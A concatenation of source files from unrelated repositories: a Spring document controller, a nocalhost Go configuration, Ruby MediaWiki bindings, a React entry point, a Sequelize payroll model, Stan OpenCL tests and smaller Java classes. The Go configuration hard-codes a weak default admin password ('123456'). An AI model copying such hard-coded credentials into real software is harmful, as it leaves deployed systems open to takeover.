    }

    /** Returns all documents, with no filtering (empty criteria). */
    @Log("查询文档")
    @ApiOperation("查询文档")
    @GetMapping(value = "/all")
    @PreAuthorize("@el.check('pcdj:list')")
    public ResponseEntity<Object> all() {
        return new ResponseEntity<>(modYqpcMainService.queryAll(new YqpcQueryCriteria()), HttpStatus.OK);
    }

    /** Paged query of documents matching the criteria. */
    @Log("查询文档")
    @ApiOperation("查询文档")
    @GetMapping
    @PreAuthorize("@el.check('pcdj:list')")
    public ResponseEntity<Object> getModDocs(YqpcQueryCriteria resources, Pageable pageable) {
        return new ResponseEntity<>(modYqpcMainService.queryAll(resources, pageable), HttpStatus.OK);
    }

    /** Fetches a single document by its id. */
    @Log("查询文档")
    @ApiOperation("查询文档")
    @GetMapping(value = "/getModYqpcById/{id}")
    @PreAuthorize("@el.check('pcdj:list')")
    public ResponseEntity<Object> getModDocsById(@PathVariable Long id) {
        return new ResponseEntity<>(modYqpcMainService.findOne(id), HttpStatus.OK);
    }

    /**
     * Creates a new document.
     *
     * @throws BadRequestException if the payload already carries an id
     */
    @Log("新增文档")
    @ApiOperation("新增文档")
    @PostMapping
    @PreAuthorize("@el.check('pcdj:add')")
    public ResponseEntity<Object> create(@Validated @RequestBody YqpcMain resources, @RequestParam("file") MultipartFile file) {
        // NOTE(review): 'file' is accepted but never used, and combining a JSON
        // @RequestBody with a multipart @RequestParam rarely works in one request
        // -- confirm the intended contract of this endpoint.
        if (resources.getId() != null) {
            throw new BadRequestException("A new " + ENTITY_NAME + " cannot already have an ID");
        }
        return new ResponseEntity<>(modYqpcMainService.save(resources), HttpStatus.CREATED);
    }

    /** Imports data from an uploaded file. */
    @ApiOperation("上传文件")
    @PostMapping(value = "/importData")
    @PreAuthorize("@el.check('pcdj:add')")
    public ResponseEntity<Object> create(@RequestParam("file") MultipartFile file) {
        // Was `new Long(888)`: the Long(long) constructor is deprecated; autobox instead.
        // NOTE(review): the hard-coded id 888 and the fixed page request below look
        // like leftover debug code -- confirm before relying on this endpoint.
        modYqpcMainService.getOne(888L);
        PageRequest pageRequest =
                new PageRequest(1, 10, new Sort(Sort.Direction.DESC, "id"));
        modYqpcMainService.findPage(pageRequest);
        return new ResponseEntity<>(new Object(), HttpStatus.CREATED);
    }

    /** Updates an existing document. */
    @Log("修改文档")
    @ApiOperation("修改文档")
    @PutMapping
    @PreAuthorize("@el.check('pcdj:edit')")
    public ResponseEntity<Object> update(@Validated(ModDocs.Update.class) @RequestBody YqpcMain resources) {
        modYqpcMainService.save(resources);
        return new ResponseEntity<>(HttpStatus.NO_CONTENT);
    }

    /** Deletes a single document by id. */
    @Log("删除文档")
    @ApiOperation("删除文档")
    @DeleteMapping(value = "/{id}")
    @PreAuthorize("@el.check('pcdj:del')")
    public ResponseEntity<Object> delete(@PathVariable Long id) {
        modYqpcMainService.deleteById(id);
        return new ResponseEntity<>(HttpStatus.OK);
    }

    /** Batch-deletes documents by id. */
    @Log("删除文档")
    @ApiOperation("删除文档")
    @DeleteMapping
    @PreAuthorize("@el.check('pcdj:del')")
    public ResponseEntity<Object> delete(@RequestBody Long[] ids) {
        modYqpcMainService.deleteBatch(ids);
        return new ResponseEntity<>(HttpStatus.OK);
    }
}
|
lyzhang1999/nocalhost
|
internal/nhctl/app/application_config.go
|
<filename>internal/nhctl/app/application_config.go
package app
import (
"strconv"
"time"
)
// Default file names, image references, and nhctl-init settings used across
// the application package.
const (
	DefaultSideCarImage = "codingcorp-docker.pkg.coding.net/nocalhost/public/nocalhost-sidecar:syncthing"
	DefaultDevImage = "codingcorp-docker.pkg.coding.net/nocalhost/public/minideb:latest"
	DefaultWorkDir = "/home/nocalhost-dev"
	DefaultLocalSyncDirName = "."
	DefaultResourcesDir = "resources"
	DefaultNhctlHomeDirName = ".nh/nhctl"
	DefaultBinDirName = "bin"
	DefaultLogDirName = "logs"
	DefaultSyncLogFileName = "sync-port-forward-child-process.log"
	DefaultApplicationSyncPortForwardPidFile = "sync-port-forward.pid"
	DefaultBinSyncThingDirName = "syncthing"
	DefaultBackGroundPortForwardLogFileName = "alone-port-forward-child-process.log"
	DefaultApplicationOnlyPortForwardPidFile = "alone-port-forward.pid"
	DefaultApplicationSyncPidFile = "syncthing.pid"
	DefaultApplicationDirName = "application"
	DefaultApplicationProfilePath = ".profile.yaml"
	DefaultApplicationConfigDirName = ".nocalhost"
	DefaultApplicationConfigName = "config.yaml"
	DefaultNewFilePermission = 0700
	DefaultClientGoTimeOut = time.Minute * 5
	// nhctl init
	// TODO when release
	DefaultInitHelmGitRepo = "<EMAIL>:codingcorp/nocalhost/nocalhost.git"
	DefaultInitHelmType = "helmGit"
	DefaultInitWatchDeployment = "nocalhost-api"
	DefaultInitWatchWebDeployment = "nocalhost-web"
	DefaultInitNocalhostService = "nocalhost-web"
	DefaultInitUserEmail = "<EMAIL>"
	// NOTE(review): default credentials are hard-coded here; presumably only
	// used for local bootstrap -- confirm they are rotated in real deployments.
	DefaultInitPassword = "<PASSWORD>"
	DefaultInitAdminUserName = "<EMAIL>"
	DefaultInitAdminPassWord = "123456"
	DefaultInitName = "nocalhost"
	DefaultInitWaitNameSpace = "nocalhost-reserved"
	DefaultInitWaitDeployment = "nocalhost-dep"
	// TODO when release
	DefaultInitHelmResourcePath = "deployments/chart"
	DefaultInitPortForwardTimeOut = time.Minute * 1
	DefaultInitApplication = "{\"source\":\"git\",\"install_type\":\"rawManifest\",\"resource_dir\":[\"manifest/templates\"],\"application_name\":\"bookinfo\",\"application_url\":\"<EMAIL>:nocalhost/bookinfo.git\"}"
)
// NocalHostAppConfig is the top-level application configuration
// (deserialized from config.yaml): pre-install hooks, per-service dev
// options, and the manifest location.
type NocalHostAppConfig struct {
	PreInstall []*PreInstallItem `json:"onPreInstall" yaml:"onPreInstall"`
	SvcConfigs []*ServiceDevOptions `json:"services" yaml:"services"`
	Name string `json:"name" yaml:"name"`
	Type AppType `json:"manifestType" yaml:"manifestType"`
	ResourcePath []string `json:"resourcePath" yaml:"resourcePath"`
	// old-config
	//AppConfig *AppConfig `json:"app_config" yaml:"appConfig"`
}

// PreInstallItem is a manifest to apply before install; Weight is a numeric
// string that orders the items (see ComparableItems).
type PreInstallItem struct {
	Path string `json:"path" yaml:"path"`
	Weight string `json:"weight" yaml:"weight"`
}

// ServiceDevOptions holds per-service development-mode settings
// (dev image, working dir, sync dirs, ports, dependency selectors).
type ServiceDevOptions struct {
	Name string `json:"name" yaml:"name"`
	Type SvcType `json:"serviceType" yaml:"serviceType"`
	GitUrl string `json:"gitUrl" yaml:"gitUrl"`
	DevImage string `json:"devContainerImage" yaml:"devContainerImage"`
	WorkDir string `json:"workDir" yaml:"workDir"`
	Sync []string `json:"syncDirs" yaml:"syncDirs"`
	Ignore []string `json:"ignores" yaml:"ignores"` // TODO Ignore file list
	DevPort []string `json:"devPorts" yaml:"devPorts"`
	Jobs []string `json:"dependJobsLabelSelector" yaml:"dependJobsLabelSelector,omitempty"`
	Pods []string `json:"dependPodsLabelSelector" yaml:"dependPodsLabelSelector,omitempty"`
}
// ComparableItems implements sort.Interface over pre-install items,
// ordering them by their numeric Weight. Non-numeric weights sort as 0.
type ComparableItems []*PreInstallItem

// itemWeight parses an item's Weight string; malformed values count as 0.
func itemWeight(item *PreInstallItem) int {
	w, err := strconv.Atoi(item.Weight)
	if err != nil {
		return 0
	}
	return w
}

func (c ComparableItems) Len() int      { return len(c) }
func (c ComparableItems) Swap(i, j int) { c[i], c[j] = c[j], c[i] }
func (c ComparableItems) Less(i, j int) bool {
	return itemWeight(c[i]) < itemWeight(c[j])
}
// GetSvcConfig looks up the dev options configured for the named service.
// It returns nil when no entry matches (ranging over a nil slice simply
// iterates zero times, so no explicit nil check is required).
func (n *NocalHostAppConfig) GetSvcConfig(name string) *ServiceDevOptions {
	for _, options := range n.SvcConfigs {
		if options.Name == name {
			return options
		}
	}
	return nil
}
|
molybdenum-99/mediawiktory
|
lib/mediawiktory/wikipedia/actions/refresheducation.rb
|
# frozen_string_literal: true
module MediaWiktory::Wikipedia
  module Actions
    # Rebuilds the summary data of Education Program objects.
    #
    # Example:
    #
    # ```ruby
    # api.refresheducation.ids(value).perform  # raw API output as a string
    # # or
    # api.refresheducation.ids(value).response # parsed, wrapped Response object
    # ```
    #
    # Refer to {Base} for how MediaWiki actions work in general and to
    # {MediaWiktory::Wikipedia::Response} for response handling.
    #
    # Each of the action's parameters is exposed as a public method below.
    #
    class Refresheducation < MediaWiktory::Wikipedia::Actions::Post
      # The IDs of the objects to refresh.
      #
      # @param values [Array<Integer>]
      # @return [self]
      def ids(*values)
        values.reduce(self) { |action, id| action._ids(id) }
      end

      # @private
      def _ids(value)
        merge(ids: value.to_s, replace: false)
      end

      # Type of object to refresh.
      #
      # @param value [String] One of "org", "course", "student".
      # @return [self]
      def type(value)
        _type(value) || raise(ArgumentError, "Unknown value for type: #{value}")
      end

      # @private
      def _type(value)
        inherited = defined?(super) && super
        return inherited if inherited
        %w[org course student].include?(value.to_s) && merge(type: value.to_s)
      end

      # A "csrf" token retrieved from action=query&meta=tokens
      #
      # @param value [String]
      # @return [self]
      def token(value)
        merge(token: value.to_s)
      end
    end
  end
end
|
leenlab2/TLI-server
|
src/main/java/com/caravantage/use_case_managers/Recommender.java
|
<gh_stars>1-10
package com.caravantage.use_case_managers;
import com.caravantage.car_recommendations.SetUpAccountHolder;
import com.caravantage.constants.RecommendationConstants;
import com.caravantage.data_access.AccountAccessInterface;
import com.caravantage.fetch_cars.BankingDataProcessor;
import com.caravantage.entities.AccountHolder;
import com.caravantage.entities.InputData;
import com.caravantage.fetch_cars.CarDataProcessor;
/**
* A use case class responsible for handling the generating a client's recommended cars and inserting
* the cars into our database
*/
public class Recommender {

    // Collaborators are injected once and never reassigned.
    private final AccountAccessInterface accountAccess;
    private final BankingDataProcessor bankProcess;
    private final CarDataProcessor carProcess;

    public Recommender(AccountAccessInterface accountAccess,
            BankingDataProcessor bankProcess, CarDataProcessor carProcess) {
        this.accountAccess = accountAccess;
        this.bankProcess = bankProcess;
        this.carProcess = carProcess;
    }

    /**
     * Follows our backend logic to generate a list of the best possible cars based on loans and saved to that client
     *
     * @param input the input sent in from our front end including the clients' IDs
     *              (a single space-separated string) and an optional trade-in car VIN
     */
    public void generateAndInsert(InputData input) {
        // Generate and insert for every client ID given by front end
        String clientIDsString = input.getClientIDs();
        String[] clientIDs = clientIDsString.split(" ");
        for (String id : clientIDs) {
            // Robustness: consecutive/trailing spaces in the input produce empty
            // tokens; skip them instead of creating a bogus account holder.
            if (id.isEmpty()) {
                continue;
            }
            AccountHolder user = new AccountHolder(id);
            // Check to see if they have a current car they would like to trade in
            if (input.getTradeInCar() != null) {
                user.setExistingCar(input.getTradeInCar());
                // Trade-in value is the car's price scaled by the depreciation ratio.
                user.setExistingCarValue((float) (carProcess.getCarByVin(user.getExistingCar()).getPrice() * RecommendationConstants.TRADE_DEPRECIATION_RATIO));
            }
            SetUpAccountHolder program = new SetUpAccountHolder(user, bankProcess, carProcess);
            program.run();
            accountAccess.insertRecommendedCars(user);
        }
    }
}
|
kkpenaranda/ITERAC_5
|
src/vos/IngresoZonaPorAdministrador.java
|
<filename>src/vos/IngresoZonaPorAdministrador.java
package vos;
import org.codehaus.jackson.annotate.JsonProperty;
/**
 * Value object pairing a zone with the administrator (id + password) that
 * registers it; (de)serialized with Jackson.
 */
public class IngresoZonaPorAdministrador {

    @JsonProperty(value= "idAdministrador")
    private Long idAdministrador;

    @JsonProperty(value="contraseniaAdministrador")
    private String contraseniaAdministrador;

    @JsonProperty(value= "zona")
    private Zona zona;

    /**
     * @param idAdministrador id of the administrator performing the entry
     * @param zona the zone being entered
     * @param contraseniaAdministrador the administrator's password
     */
    public IngresoZonaPorAdministrador(@JsonProperty(value= "idAdministrador") Long idAdministrador, @JsonProperty(value= "zona") Zona zona, @JsonProperty(value="contraseniaAdministrador") String contraseniaAdministrador) {
        super();
        this.idAdministrador = idAdministrador;
        this.zona = zona;
        this.contraseniaAdministrador= contraseniaAdministrador;
    }

    /**
     * @return the idAdministrador
     */
    public Long getIdAdministrador() {
        return idAdministrador;
    }

    /**
     * @param idAdministrador the idAdministrador to set
     */
    public void setIdAdministrador(Long idAdministrador) {
        this.idAdministrador = idAdministrador;
    }

    /**
     * @return the zona
     */
    public Zona getZona() {
        return zona;
    }

    /**
     * @param zona the zona to set
     */
    public void setZona(Zona zona) {
        this.zona = zona;
    }

    /**
     * @return the administrator's password
     */
    public String getContraseniaAdministrador() {
        return contraseniaAdministrador;
    }

    /**
     * @param contraseniaAdministrador the administrator's password to set
     */
    public void setContraseniaAdministrador(String contraseniaAdministrador) {
        this.contraseniaAdministrador = contraseniaAdministrador;
    }
}
|
Filjo0/JavaRushTasks
|
1.JavaSyntax/src/com/javarush/task/task07/task0707/Solution.java
|
package com.javarush.task.task07.task0707;
import java.lang.reflect.Array;
import java.util.ArrayList;
/*
Что за список такой?
*/
public class Solution {
public static void main(String[] args) throws Exception {
ArrayList<String> list = new ArrayList<>();
list.add("1");
list.add("1");
list.add("1");
list.add("1");
list.add("1");
System.out.println(list.size());
for (int i = 0; i < list.size(); i++) {
System.out.println(list.get(i));
//напишите тут ваш код
}
}
}
|
sasano8/pyright
|
packages/pyright-internal/src/tests/samples/loops1.py
|
# Pyright test fixture: exercises type narrowing of an Optional variable
# across loop constructs (for/else, while/else). Errors here are intentional.
def bar(a: list):
    pass
def func1():
    data = None
    for x in [2, 3]:
        if not data:
            data = [1, 2]
        else:
            # This should not generate an error because the
            # type checker should be able to determine that
            # data must be a list at this point in the code.
            bar(data)
    else:
        # This should generate an error because the
        # type checker should be able to determine that
        # data must contain None at this point.
        bar(data)
x = 20 + 20
def func2():
    data = None
    while x:
        if not data:
            data = [1, 2]
        else:
            # This should not generate an error because the
            # type checker should be able to determine that
            # data must be a list at this point in the code.
            bar(data)
    else:
        # This should generate an error because the
        # type checker should be able to determine that
        # data must contain None at this point.
        bar(data)
|
FreeSlave/resolve
|
examples/cli-uploader/client/index.js
|
import React from 'react'
import { render } from 'react-dom'
import { createResolveStore, ResolveReduxProvider } from 'resolve-redux'
import jsCookie from 'js-cookie'
import jwt from 'jsonwebtoken'
import App from './containers/App'
import Layout from './components/Layout'

// Client entry point for the cli-uploader example: decodes the JWT cookie,
// seeds it into the Redux store, and mounts the React application.
const entryPoint = (clientContext) => {
  // Decode the auth cookie if present; a missing/non-string cookie yields null.
  const token = jsCookie.get('jwt')
  const jwtObject =
    token != null && token.constructor === String ? jwt.decode(token) : null
  // The `jwt` reducer is an identity reducer: the decoded token is placed in
  // the initial state and never changed afterwards.
  const store = createResolveStore(clientContext, {
    redux: {
      reducers: {
        jwt: (token = {}) => token,
      },
    },
    initialState: { jwt: jwtObject },
  })
  // Mount point is created dynamically rather than relying on a static div.
  const appContainer = document.createElement('div')
  document.body.appendChild(appContainer)
  render(
    <ResolveReduxProvider store={store} context={clientContext}>
      <Layout jwt={jwtObject}>
        <App store={store} CDNUrl={clientContext.cdnUrl} />
      </Layout>
    </ResolveReduxProvider>,
    appContainer
  )
}
export default entryPoint
|
javg15/sirh_backend
|
app/models/rhnominas.model.js
|
<reponame>javg15/sirh_backend
// Sequelize model definition for the payroll table `rhnominas` (public schema).
// Column names are kept as-is from the legacy database; timestamps map to
// created_at / updated_at.
module.exports = function(sequelize, DataTypes) {
    return sequelize.define('rhnominas', {
        id: {
            autoIncrement: true,
            type: DataTypes.INTEGER,
            allowNull: false,
            primaryKey: true
        },
        // Pay period (fortnight) amount/identifier.
        quincenapago: {
            type: DataTypes.DECIMAL(19, 4),
            allowNull: false
        },
        // Employee number.
        numemp: {
            type: DataTypes.STRING(5),
            allowNull: false
        },
        nombreempleado: {
            type: DataTypes.STRING(100),
            allowNull: false
        },
        fechingcobaev: {
            type: DataTypes.DATEONLY,
            allowNull: false
        },
        antiguedad: {
            type: DataTypes.STRING(25),
            allowNull: false
        },
        clavecategoria: {
            type: DataTypes.STRING(3),
            allowNull: false
        },
        desccategoria: {
            type: DataTypes.STRING(100),
            allowNull: false
        },
        claveplantel: {
            type: DataTypes.STRING(3),
            allowNull: false
        },
        descplantel: {
            type: DataTypes.STRING(100),
            allowNull: false
        },
        clavect: {
            type: DataTypes.STRING(10),
            allowNull: false
        },
        nombrect: {
            type: DataTypes.STRING(100),
            allowNull: false
        },
        idqnavigini: {
            type: DataTypes.INTEGER,
            allowNull: false
        },
        idqnavigfin: {
            type: DataTypes.INTEGER,
            allowNull: false
        },
        qnainicio: {
            type: DataTypes.STRING(6),
            allowNull: false
        },
        qnafin: {
            type: DataTypes.STRING(6),
            allowNull: false
        },
        id_esquemapago: {
            type: DataTypes.INTEGER,
            allowNull: false
        },
        esquemapago: {
            type: DataTypes.STRING(3),
            allowNull: false
        },
        // Monthly net amounts (perceptions / deductions / total).
        permensualneto: {
            type: DataTypes.DECIMAL(19, 4),
            allowNull: false
        },
        dedmensualneto: {
            type: DataTypes.DECIMAL(19, 4),
            allowNull: false
        },
        totmensualneto: {
            type: DataTypes.DECIMAL(19, 4),
            allowNull: false
        },
        compensacion: {
            type: DataTypes.DECIMAL(19, 4),
            allowNull: false
        },
        // Fortnightly gross amounts.
        percquinbruto: {
            type: DataTypes.DECIMAL(19, 4),
            allowNull: false
        },
        deduquinbruto: {
            type: DataTypes.DECIMAL(19, 4),
            allowNull: false
        },
        totquinbruto: {
            type: DataTypes.DECIMAL(19, 4),
            allowNull: false
        },
        totmnbruto: {
            type: DataTypes.DECIMAL(19, 4),
            allowNull: false
        },
        id_sindicato: {
            type: DataTypes.INTEGER,
            allowNull: false
        },
        siglassindicato: {
            type: DataTypes.STRING(15),
            allowNull: false
        },
        id_tipoemp: {
            type: DataTypes.INTEGER,
            allowNull: false
        },
        tipoempleado: {
            type: DataTypes.STRING(20),
            allowNull: false
        },
        id_empfuncion: {
            type: DataTypes.INTEGER,
            allowNull: false
        },
        empfuncion: {
            type: DataTypes.STRING(35),
            allowNull: false
        },
        id_funcionpri: {
            type: DataTypes.INTEGER,
            allowNull: false
        },
        funcionpri: {
            type: DataTypes.STRING(35),
            allowNull: false
        },
        id_funcionsec: {
            type: DataTypes.INTEGER,
            allowNull: false
        },
        funcionsec: {
            type: DataTypes.STRING(60),
            allowNull: false
        },
        clavemotgralbaja: {
            type: DataTypes.INTEGER,
            allowNull: false
        },
        desmotgralbaja: {
            type: DataTypes.STRING(75),
            allowNull: false
        },
        interinopuro: {
            type: DataTypes.INTEGER,
            allowNull: false
        },
        orden: {
            type: DataTypes.INTEGER,
            allowNull: true
        },
        verificado: {
            type: DataTypes.INTEGER,
            allowNull: true
        },
        observaciones: {
            type: DataTypes.STRING(1000),
            allowNull: true
        },
        compensacionpa: {
            type: DataTypes.DECIMAL(19, 4),
            allowNull: true
        },
        rfc: {
            type: DataTypes.STRING(15),
            allowNull: true
        },
        // Audit columns: recording user, soft-delete state, and timestamps.
        id_usuarios_r: {
            type: DataTypes.INTEGER,
            allowNull: false,
            defaultValue: 0
        },
        state: {
            type: DataTypes.CHAR(1),
            allowNull: false,
            defaultValue: "A"
        },
        created_at: {
            type: DataTypes.DATE,
            allowNull: true
        },
        updated_at: {
            type: DataTypes.DATE,
            allowNull: true
        }
    }, {
        sequelize,
        tableName: 'rhnominas',
        schema: 'public',
        //timestamps: false
        createdAt: 'created_at',
        updatedAt: 'updated_at',
    });
};
|
bayesmix-dev/math
|
test/unit/math/opencl/rev/scaled_inv_chi_square_lpdf_test.cpp
|
#ifdef STAN_OPENCL
#include <stan/math/opencl/rev.hpp>
#include <stan/math.hpp>
#include <gtest/gtest.h>
#include <test/unit/math/opencl/util.hpp>
#include <vector>
// Verifies argument validation of the OpenCL scaled_inv_chi_square_lpdf:
// mismatched sizes must raise invalid_argument, out-of-domain values
// (NaN y, non-positive/infinite nu or s) must raise domain_error.
TEST(ProbDistributionsScaledInvChiSquare, error_checking) {
  int N = 3;
  // Valid inputs plus deliberately wrong-sized and invalid-valued variants.
  Eigen::VectorXd y(N);
  y << 0.3, 0.8, 1.0;
  Eigen::VectorXd y_size(N - 1);
  y_size << 0.3, 0.8;
  Eigen::VectorXd y_value(N);
  y_value << 0.3, NAN, 0.5;
  Eigen::VectorXd nu(N);
  nu << 0.3, 0.8, 1.0;
  Eigen::VectorXd nu_size(N - 1);
  nu_size << 0.3, 0.8;
  Eigen::VectorXd nu_value1(N);
  nu_value1 << 0.3, 0, 0.5;
  Eigen::VectorXd nu_value2(N);
  nu_value2 << 0.3, INFINITY, 0.5;
  Eigen::VectorXd s(N);
  s << 0.3, 0.8, 1.0;
  Eigen::VectorXd s_size(N - 1);
  s_size << 0.3, 0.8;
  Eigen::VectorXd s_value1(N);
  s_value1 << 0.3, 0, 0.5;
  Eigen::VectorXd s_value2(N);
  s_value2 << 0.3, INFINITY, 0.5;
  // Copy everything to the OpenCL device.
  stan::math::matrix_cl<double> y_cl(y);
  stan::math::matrix_cl<double> y_size_cl(y_size);
  stan::math::matrix_cl<double> y_value_cl(y_value);
  stan::math::matrix_cl<double> nu_cl(nu);
  stan::math::matrix_cl<double> nu_size_cl(nu_size);
  stan::math::matrix_cl<double> nu_value1_cl(nu_value1);
  stan::math::matrix_cl<double> nu_value2_cl(nu_value2);
  stan::math::matrix_cl<double> s_cl(s);
  stan::math::matrix_cl<double> s_size_cl(s_size);
  stan::math::matrix_cl<double> s_value1_cl(s_value1);
  stan::math::matrix_cl<double> s_value2_cl(s_value2);
  // Well-formed call must not throw.
  EXPECT_NO_THROW(stan::math::scaled_inv_chi_square_lpdf(y_cl, nu_cl, s_cl));
  // Size mismatches -> invalid_argument.
  EXPECT_THROW(stan::math::scaled_inv_chi_square_lpdf(y_size_cl, nu_cl, s_cl),
               std::invalid_argument);
  EXPECT_THROW(stan::math::scaled_inv_chi_square_lpdf(y_cl, nu_size_cl, s_cl),
               std::invalid_argument);
  EXPECT_THROW(stan::math::scaled_inv_chi_square_lpdf(y_cl, nu_cl, s_size_cl),
               std::invalid_argument);
  // Out-of-domain values -> domain_error.
  EXPECT_THROW(stan::math::scaled_inv_chi_square_lpdf(y_value_cl, nu_cl, s_cl),
               std::domain_error);
  EXPECT_THROW(stan::math::scaled_inv_chi_square_lpdf(y_cl, nu_value1_cl, s_cl),
               std::domain_error);
  EXPECT_THROW(stan::math::scaled_inv_chi_square_lpdf(y_cl, nu_value2_cl, s_cl),
               std::domain_error);
  EXPECT_THROW(stan::math::scaled_inv_chi_square_lpdf(y_cl, nu_cl, s_value1_cl),
               std::domain_error);
  EXPECT_THROW(stan::math::scaled_inv_chi_square_lpdf(y_cl, nu_cl, s_value2_cl),
               std::domain_error);
}
// Functor wrappers over the lpdf so it can be passed to the CPU/OpenCL
// comparison helpers below.
auto scaled_inv_chi_square_lpdf_functor
    = [](const auto& y, const auto& nu, const auto& s) {
        return stan::math::scaled_inv_chi_square_lpdf(y, nu, s);
      };
// Same, but with propto = true (drops terms constant in the parameters).
auto scaled_inv_chi_square_lpdf_functor_propto
    = [](const auto& y, const auto& nu, const auto& s) {
        return stan::math::scaled_inv_chi_square_lpdf<true>(y, nu, s);
      };
// OpenCL and CPU implementations must agree (values and gradients) on a
// small all-valid input, for both normalized and propto variants.
TEST(ProbDistributionsScaledInvChiSquare, opencl_matches_cpu_small) {
  int N = 3;
  // Removed unused local `int M = 2;`.
  Eigen::VectorXd y(N);
  y << 0.3, 0.8, 1.0;
  Eigen::VectorXd nu(N);
  nu << 0.3, 0.8, 1.0;
  Eigen::VectorXd s(N);
  s << 0.3, 0.8, 1.0;
  stan::math::test::compare_cpu_opencl_prim_rev(
      scaled_inv_chi_square_lpdf_functor_propto, y, nu, s);
  stan::math::test::compare_cpu_opencl_prim_rev(
      scaled_inv_chi_square_lpdf_functor, y, nu, s);
}
// CPU/OpenCL agreement when one y is negative (outside the support),
// which both implementations must handle identically.
TEST(ProbDistributionsScaledInvChiSquare, opencl_matches_cpu_small_y_negative) {
  int N = 3;
  // Removed unused local `int M = 2;`.
  Eigen::VectorXd y(N);
  y << 0.3, -0.8, 1.0;
  Eigen::VectorXd nu(N);
  nu << 0.3, 0.8, 1.0;
  Eigen::VectorXd s(N);
  s << 0.3, 0.8, 1.0;
  stan::math::test::compare_cpu_opencl_prim_rev(
      scaled_inv_chi_square_lpdf_functor, y, nu, s);
  stan::math::test::compare_cpu_opencl_prim_rev(
      scaled_inv_chi_square_lpdf_functor_propto, y, nu, s);
}
// Broadcasting a scalar y against vector nu/s (template index 0 selects
// which argument is broadcast).
TEST(ProbDistributionsScaledInvChiSquare, opencl_broadcast_y) {
  int N = 3;
  double y_scal = 12.3;
  Eigen::VectorXd nu(N);
  nu << 0.5, 1.2, 1.0;
  Eigen::VectorXd s(N);
  s << 0.3, 0.8, 1.0;
  stan::math::test::test_opencl_broadcasting_prim_rev<0>(
      scaled_inv_chi_square_lpdf_functor, y_scal, nu, s);
  stan::math::test::test_opencl_broadcasting_prim_rev<0>(
      scaled_inv_chi_square_lpdf_functor_propto, y_scal, nu, s);
}
// Broadcasting a scalar nu (argument index 1).
TEST(ProbDistributionsScaledInvChiSquare, opencl_broadcast_nu) {
  int N = 3;
  Eigen::VectorXd y(N);
  y << 0.3, 0.8, 1.0;
  double nu_scal = 12.3;
  Eigen::VectorXd s(N);
  s << 0.3, 0.8, 1.0;
  stan::math::test::test_opencl_broadcasting_prim_rev<1>(
      scaled_inv_chi_square_lpdf_functor, y, nu_scal, s);
  stan::math::test::test_opencl_broadcasting_prim_rev<1>(
      scaled_inv_chi_square_lpdf_functor_propto, y, nu_scal, s);
}
// Broadcasting a scalar s (argument index 2).
TEST(ProbDistributionsScaledInvChiSquare, opencl_broadcast_s) {
  int N = 3;
  Eigen::VectorXd y(N);
  y << 0.3, 0.8, 1.0;
  Eigen::VectorXd nu(N);
  nu << 0.3, 0.8, 1.0;
  double s_scal = 12.3;
  stan::math::test::test_opencl_broadcasting_prim_rev<2>(
      scaled_inv_chi_square_lpdf_functor, y, nu, s_scal);
  stan::math::test::test_opencl_broadcasting_prim_rev<2>(
      scaled_inv_chi_square_lpdf_functor_propto, y, nu, s_scal);
}
// Larger randomized inputs; abs() keeps all three parameters in-support.
TEST(ProbDistributionsScaledInvChiSquare, opencl_matches_cpu_big) {
  int N = 153;
  Eigen::Matrix<double, Eigen::Dynamic, 1> y
      = Eigen::Array<double, Eigen::Dynamic, 1>::Random(N, 1).abs();
  Eigen::Matrix<double, Eigen::Dynamic, 1> nu
      = Eigen::Array<double, Eigen::Dynamic, 1>::Random(N, 1).abs();
  Eigen::Matrix<double, Eigen::Dynamic, 1> s
      = Eigen::Array<double, Eigen::Dynamic, 1>::Random(N, 1).abs();
  stan::math::test::compare_cpu_opencl_prim_rev(
      scaled_inv_chi_square_lpdf_functor, y, nu, s);
  stan::math::test::compare_cpu_opencl_prim_rev(
      scaled_inv_chi_square_lpdf_functor_propto, y, nu, s);
}
#endif
|
prasannachinnapareddy/FullStactDevelopement
|
Secondlar.java
|
<reponame>prasannachinnapareddy/FullStactDevelopement<gh_stars>0
package com.cts.main;
import java.util.Scanner;
/*
Write a program in Java to find the second largest element in an array.
Test Data :
Input the size of array : 5
Input 5 elements in the array :
element - 0 : 2
element - 1 : 9
element - 2 : 1
element - 3 : 4
element - 4 : 6
Expected Output :
The Second largest element in the array is : 6
*/
public class Secondlar {

    /**
     * Returns the second largest distinct value in the array.
     *
     * <p>Fixes the original implementation, which seeded both the largest
     * and second-largest trackers with {@code a[0]}: when the maximum was
     * the first element (e.g. {9, 2, 1}) it incorrectly returned the
     * maximum itself.
     *
     * @param a input values; must contain at least two elements
     * @return the second largest distinct value, or {@link Integer#MIN_VALUE}
     *         if all elements are equal
     * @throws IllegalArgumentException if {@code a} is null or has fewer
     *         than two elements
     */
    static int secondLargest(int[] a) {
        if (a == null || a.length < 2) {
            throw new IllegalArgumentException("need at least two elements");
        }
        int largest = Integer.MIN_VALUE;
        int second = Integer.MIN_VALUE;
        for (int v : a) {
            if (v > largest) {
                // New maximum: previous maximum becomes the runner-up.
                second = largest;
                largest = v;
            } else if (v > second && v < largest) {
                second = v;
            }
        }
        return second;
    }

    /**
     * Reads a size and that many integers from stdin, echoes them, and
     * prints the second largest value (same output format as before).
     */
    public static void main(String[] args) {
        Scanner s = new Scanner(System.in);
        int n = s.nextInt();
        int[] a = new int[n];
        for (int i = 0; i < n; i++) {
            a[i] = s.nextInt();
            System.out.println("elements in array:" + a[i]);
        }
        System.out.println("secondlarge num is:" + secondLargest(a));
        s.close();
    }
}
|
liyork/violin
|
violin-utils/src/main/java/com/wolf/utils/redis/threadpool/CommonThreadPool.java
|
/**
* Description: CommonThreadPool.java
* All Rights Reserved.
*/
package com.wolf.utils.redis.threadpool;
import java.io.IOException;
import java.io.InputStream;
import java.lang.management.ManagementFactory;
import java.text.SimpleDateFormat;
import java.util.Collection;
import java.util.Date;
import java.util.Properties;
import java.util.concurrent.*;
import java.util.concurrent.atomic.AtomicInteger;
/**
 *
 * Shared thread pool for asynchronous execution; its configuration is
 * documented in the comments of threadPoolConfig.properties.
 * <br/> Created on 2012-9-24 09:30:31 AM
 * @since 1.0
 */
public final class CommonThreadPool {
    // private static final Logger logger = LoggerFactory.getLogger(CommonThreadPool.class);

    /** Timestamp pattern used when logging rejected tasks. */
    public static final String LONG_FORMAT = "yyyy-MM-dd HH:mm:ss";
    /** Singleton executor backing {@link #execute(IAsynchronousHandler)}; built eagerly from config. */
    private static ExecutorService execute = init();
    /** Per-task execution time budget handed to ThreadPoolAdaptor. */
    private static final long EXECUTETIME = 10000L;

    private CommonThreadPool() {
    }

    /**
     * Submits a task for asynchronous execution on the shared pool.
     *
     * @param command task to run
     * @return future that completes with the task's result
     */
